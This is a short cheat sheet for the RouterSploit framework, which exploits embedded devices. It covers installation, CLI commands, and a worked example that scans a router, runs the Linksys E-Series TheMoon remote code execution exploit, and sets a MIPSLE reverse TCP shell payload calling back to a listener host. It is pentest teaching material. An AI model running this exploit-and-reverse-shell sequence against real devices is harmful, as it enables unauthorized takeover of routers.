
The RouterSploit Framework is an open-source exploitation framework written in Python and dedicated to embedded devices.
It consists of various modules that aid penetration testing operations:
- exploits – modules that take advantage of identified vulnerabilities
- creds – modules designed to test credentials against network services
- scanners – modules that check if a target is vulnerable to any exploit
- payloads – modules that are responsible for generating payloads for various architectures and injection points
- generic – modules that perform generic attacks
Commands RouterSploit:
RouterSploit Installation
# https://github.com/threat9/routersploit
# On Kali:
apt update && apt install routersploit
# On Kali and any other Linux distribution:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit # move into routersploit directory
python3 -m pip install -r requirements.txt
# To update RouterSploit run `git pull` in the RouterSploit directory.
# To start RouterSploit run `python3 rsf.py` in the RouterSploit directory.
RouterSploit CLI:
# Use <tab> key multiple times for completion.
# shows all modules
rsf> show all
# searches
rsf> search cisco
rsf> search type=exploits
rsf> search device=cameras
# selecting a module
rsf> use module_name
# displaying the options of a selected module
rsf> show options
# setting an option of a module
rsf> set option_name
# launching a module
csf> run
Example:
rsf > use scanners/autopwn
rsf (AutoPwn) >
rsf (AutoPwn) > set target 192.168.0.1
[+] target => 192.168.0.1
rsf (AutoPwn) > show options
rsf (AutoPwn) > run
# if the target is vulnerable, execute the exploit
rsf (AutoPwn) > use exploits/routers/linksys/eseries_themoon_rce
rsf (Linksys E-Series TheMoon RCE) > show options
rsf (Linksys E-Series TheMoon RCE) > set target 192.168.0.1
rsf (Linksys E-Series TheMoon RCE) > run
cmd> show payloads
cmd > set payload mipsle/reverse_tcp
cmd (MIPSLE Reverse TCP) > set lhost 192.168.0.30
lhost => 192.168.0.30
cmd (MIPSLE Reverse TCP) > run
